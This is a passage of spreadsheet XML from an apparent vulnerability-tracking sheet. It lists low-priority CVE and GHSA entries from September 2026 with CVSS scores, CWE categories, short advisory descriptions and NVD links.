      <c r="R1281" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read vulnerability in Citirx Workspace app for Windows.
This issue affects Workspace app for Windows: before 2603.11 Current Release (CR), before 2507.1 LTSR CU3, and before LTSR 2607.</t>
        </is>
      </c>
      <c r="S1281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78546</t>
        </is>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1282" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79943</t>
        </is>
      </c>
      <c r="D1282" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1282" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1282" s="5" t="inlineStr"/>
      <c r="H1282" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1282" s="5" t="inlineStr"/>
      <c r="J1282" s="5" t="inlineStr"/>
      <c r="K1282" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1282" s="5" t="inlineStr"/>
      <c r="M1282" s="5" t="inlineStr"/>
      <c r="N1282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1282" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1282" s="5" t="inlineStr"/>
      <c r="Q1282" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="R1282" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Validation of Certificate with Host Mismatch vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S1282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79943</t>
        </is>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1283" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82763</t>
        </is>
      </c>
      <c r="D1283" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1283" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1283" s="5" t="inlineStr"/>
      <c r="H1283" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1283" s="5" t="inlineStr"/>
      <c r="J1283" s="5" t="inlineStr"/>
      <c r="K1283" s="5" t="inlineStr"/>
      <c r="L1283" s="5" t="inlineStr"/>
      <c r="M1283" s="5" t="inlineStr"/>
      <c r="N1283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1283" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1283" s="5" t="inlineStr"/>
      <c r="Q1283" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1283" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in Contec FX5000 series, FX4000 series, and FX3000 series. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82763</t>
        </is>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1284" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82767</t>
        </is>
      </c>
      <c r="D1284" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1284" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1284" s="5" t="inlineStr"/>
      <c r="H1284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1284" s="5" t="inlineStr"/>
      <c r="J1284" s="5" t="inlineStr"/>
      <c r="K1284" s="5" t="inlineStr"/>
      <c r="L1284" s="5" t="inlineStr"/>
      <c r="M1284" s="5" t="inlineStr"/>
      <c r="N1284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1284" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1284" s="5" t="inlineStr"/>
      <c r="Q1284" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1284" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in SGA1000. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82767</t>
        </is>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1285" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82769</t>
        </is>
      </c>
      <c r="D1285" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1285" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1285" s="5" t="inlineStr"/>
      <c r="H1285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1285" s="5" t="inlineStr"/>
      <c r="J1285" s="5" t="inlineStr"/>
      <c r="K1285" s="5" t="inlineStr"/>
      <c r="L1285" s="5" t="inlineStr"/>
      <c r="M1285" s="5" t="inlineStr"/>
      <c r="N1285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1285" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1285" s="5" t="inlineStr"/>
      <c r="Q1285" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1285" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in Contec RP-WAH-SR Series. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82769</t>
        </is>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1286" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82771</t>
        </is>
      </c>
      <c r="D1286" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1286" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1286" s="5" t="inlineStr"/>
      <c r="H1286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1286" s="5" t="inlineStr"/>
      <c r="J1286" s="5" t="inlineStr"/>
      <c r="K1286" s="5" t="inlineStr"/>
      <c r="L1286" s="5" t="inlineStr"/>
      <c r="M1286" s="5" t="inlineStr"/>
      <c r="N1286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1286" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1286" s="5" t="inlineStr"/>
      <c r="Q1286" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1286" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in Contec EC1000 series. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82771</t>
        </is>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1287" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82790</t>
        </is>
      </c>
      <c r="D1287" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1287" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1287" s="5" t="inlineStr"/>
      <c r="H1287" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1287" s="5" t="inlineStr"/>
      <c r="J1287" s="5" t="inlineStr"/>
      <c r="K1287" s="5" t="inlineStr"/>
      <c r="L1287" s="5" t="inlineStr"/>
      <c r="M1287" s="5" t="inlineStr"/>
      <c r="N1287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1287" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1287" s="5" t="inlineStr"/>
      <c r="Q1287" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1287" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in PC-HELPER Wireless I/O DIO-0404RY-LWF and PC-HELPER Wireless I/O DIO-0404RY-LWF-US. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82790</t>
        </is>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1288" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82792</t>
        </is>
      </c>
      <c r="D1288" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1288" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1288" s="5" t="inlineStr"/>
      <c r="H1288" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1288" s="5" t="inlineStr"/>
      <c r="J1288" s="5" t="inlineStr"/>
      <c r="K1288" s="5" t="inlineStr"/>
      <c r="L1288" s="5" t="inlineStr"/>
      <c r="M1288" s="5" t="inlineStr"/>
      <c r="N1288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1288" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1288" s="5" t="inlineStr"/>
      <c r="Q1288" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1288" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting vulnerability exists in Contec CAN 2.0B Communication Wireless LAN / USB Converter Unit. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser.</t>
        </is>
      </c>
      <c r="S1288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82792</t>
        </is>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1289" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86889</t>
        </is>
      </c>
      <c r="D1289" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1289" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1289" s="5" t="inlineStr"/>
      <c r="H1289" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1289" s="5" t="inlineStr"/>
      <c r="J1289" s="5" t="inlineStr"/>
      <c r="K1289" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1289" s="5" t="inlineStr"/>
      <c r="M1289" s="5" t="inlineStr"/>
      <c r="N1289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1289" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1289" s="5" t="inlineStr"/>
      <c r="Q1289" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1289" s="5" t="inlineStr">
        <is>
          <t>A certificate validation issue was addressed with improved certificate validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An attacker in a privileged network position may be able to intercept network traffic.</t>
        </is>
      </c>
      <c r="S1289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86889</t>
        </is>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1290" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90570</t>
        </is>
      </c>
      <c r="D1290" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1290" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1290" s="5" t="inlineStr"/>
      <c r="H1290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1290" s="5" t="inlineStr"/>
      <c r="J1290" s="5" t="inlineStr"/>
      <c r="K1290" s="5" t="inlineStr"/>
      <c r="L1290" s="5" t="inlineStr"/>
      <c r="M1290" s="5" t="inlineStr"/>
      <c r="N1290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1290" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1290" s="5" t="inlineStr"/>
      <c r="Q1290" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1290" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in linlinjava litemall 1.4.0/1.5.0/1.6.0/1.7.0/1.8.0. This issue affects the function AdminGoodsService.validate of the file litemall-vue/src/views/items/detail/index.vue of the component Product Detail. Such manipulation of the argument detail leads to cross site scripting. The attack may be launched remotely. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90570</t>
        </is>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1291" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90781</t>
        </is>
      </c>
      <c r="D1291" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1291" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1291" s="5" t="inlineStr"/>
      <c r="H1291" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1291" s="5" t="inlineStr"/>
      <c r="J1291" s="5" t="inlineStr"/>
      <c r="K1291" s="5" t="inlineStr"/>
      <c r="L1291" s="5" t="inlineStr"/>
      <c r="M1291" s="5" t="inlineStr"/>
      <c r="N1291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1291" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1291" s="5" t="inlineStr"/>
      <c r="Q1291" s="5" t="inlineStr">
        <is>
          <t>CWE-193</t>
        </is>
      </c>
      <c r="R1291" s="5" t="inlineStr">
        <is>
          <t>alsa-lib through 1.2.16.1 contains a stack buffer overflow in the __snd_ctl_ascii_elem_id_parse() function that writes one byte past a 64-byte buffer when parsing a name= field with 64 or more characters. Attackers can supply a long control-element identifier string through saved state files or command-line arguments to overwrite adjacent stack memory and crash the calling process.</t>
        </is>
      </c>
      <c r="S1291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90781</t>
        </is>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92298</t>
        </is>
      </c>
      <c r="D1292" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1292" s="5" t="inlineStr"/>
      <c r="H1292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1292" s="5" t="inlineStr"/>
      <c r="J1292" s="5" t="inlineStr"/>
      <c r="K1292" s="5" t="inlineStr"/>
      <c r="L1292" s="5" t="inlineStr"/>
      <c r="M1292" s="5" t="inlineStr"/>
      <c r="N1292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1292" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1292" s="5" t="inlineStr"/>
      <c r="Q1292" s="5" t="inlineStr">
        <is>
          <t>CWE-338</t>
        </is>
      </c>
      <c r="R1292" s="5" t="inlineStr">
        <is>
          <t>EspoCRM through 10.0.8 uses PHP's rand() function to generate tokens for lead-capture opt-in, event invitation, and campaign URLs instead of a cryptographically secure generator. Remote unauthenticated attackers can guess these roughly 31-bit tokens to confirm opt-ins, accept or decline event invitations on behalf of other contacts, and access event details.</t>
        </is>
      </c>
      <c r="S1292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92298</t>
        </is>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1293" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1293" s="5" t="inlineStr">
        <is>
          <t>GHSA-4wj4-79rr-pvff</t>
        </is>
      </c>
      <c r="D1293" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1293" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1293" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1293" s="5" t="inlineStr"/>
      <c r="H1293" s="5" t="inlineStr"/>
      <c r="I1293" s="5" t="inlineStr"/>
      <c r="J1293" s="5" t="inlineStr"/>
      <c r="K1293" s="5" t="inlineStr"/>
      <c r="L1293" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M1293" s="5" t="inlineStr"/>
      <c r="N1293" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1293" s="5" t="inlineStr"/>
      <c r="P1293" s="5" t="inlineStr"/>
      <c r="Q1293" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1293" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-ffmg-hfvg-jhg9. This link is maintained to preserve external references.
### Original Description
Grav before 2.0.0 (affected through 2.0.0-rc.9 and the 2.0 branch) contains a stored CSS injection vulnerability in the Markdown image resize() media action. Prior media hardening rejects direct ?style= payloads and unsafe attribute() fallbacks, but the resize() action in Excerpts::processMediaActions() writes caller-controlled values directly into the image's styleAttributes. A lower-privileged content editor who can edit page Markdown can store a crafted image URL with semicolon-delimited CSS declarations in the resize parameters, which are rendered into the final &lt;img style=...&gt; attribute when a higher-privileged reviewer/admin views the page or preview. This does not require JavaScript execution but enables UI redress/overlay and content-manipulation attacks (e.g., a full-viewport fixed overlay). Fixed in 2.0.0.</t>
        </is>
      </c>
      <c r="S1293" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-4wj4-79rr-pvff</t>
        </is>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1294" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13277</t>
        </is>
      </c>
      <c r="D1294" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1294" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1294" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1294" s="5" t="inlineStr"/>
      <c r="H1294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1294" s="5" t="inlineStr"/>
      <c r="J1294" s="5" t="inlineStr"/>
      <c r="K1294" s="5" t="inlineStr"/>
      <c r="L1294" s="5" t="inlineStr"/>
      <c r="M1294" s="5" t="inlineStr"/>
      <c r="N1294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1294" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1294" s="5" t="inlineStr"/>
      <c r="Q1294" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1294" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim.</t>
        </is>
      </c>
      <c r="S1294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13277</t>
        </is>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19619</t>
        </is>
      </c>
      <c r="D1295" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1295" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1295" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G1295" s="5" t="inlineStr"/>
      <c r="H1295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1295" s="5" t="inlineStr"/>
      <c r="J1295" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K1295" s="5" t="inlineStr"/>
      <c r="L1295" s="5" t="inlineStr"/>
      <c r="M1295" s="5" t="inlineStr"/>
      <c r="N1295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1295" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1295" s="5" t="inlineStr"/>
      <c r="Q1295" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1295" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 19.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to execute arbitrary JavaScript in the context of a targeted user's session due to improper sanitization of pasted HTML content in the Content Editor.</t>
        </is>
      </c>
      <c r="S1295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19619</t>
        </is>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20350</t>
        </is>
      </c>
      <c r="D1296" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1296" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1296" s="5" t="inlineStr"/>
      <c r="H1296" s="5" t="inlineStr"/>
      <c r="I1296" s="5" t="inlineStr"/>
      <c r="J1296" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1296" s="5" t="inlineStr"/>
      <c r="L1296" s="5" t="inlineStr"/>
      <c r="M1296" s="5" t="inlineStr"/>
      <c r="N1296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1296" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1296" s="5" t="inlineStr"/>
      <c r="Q1296" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R1296" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ThousandEyes Virtual Appliance could allow an authenticated, remote attacker to inject arbitrary operating system commands.
This vulnerability is due to improper validation of user-supplied input to the web-based management interface. An attacker could exploit this vulnerability by saving configuration details that contain malicious values. A successful exploit could allow the attacker to execute arbitrary operating system commands with root privileges. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S1296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20350</t>
        </is>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1297" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43690</t>
        </is>
      </c>
      <c r="D1297" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1297" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1297" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1297" s="5" t="inlineStr"/>
      <c r="H1297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1297" s="5" t="inlineStr"/>
      <c r="J1297" s="5" t="inlineStr"/>
      <c r="K1297" s="5" t="inlineStr"/>
      <c r="L1297" s="5" t="inlineStr"/>
      <c r="M1297" s="5" t="inlineStr"/>
      <c r="N1297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1297" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1297" s="5" t="inlineStr"/>
      <c r="Q1297" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1297" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved locking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. A local user may be able to read kernel memory.</t>
        </is>
      </c>
      <c r="S1297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43690</t>
        </is>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1298" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
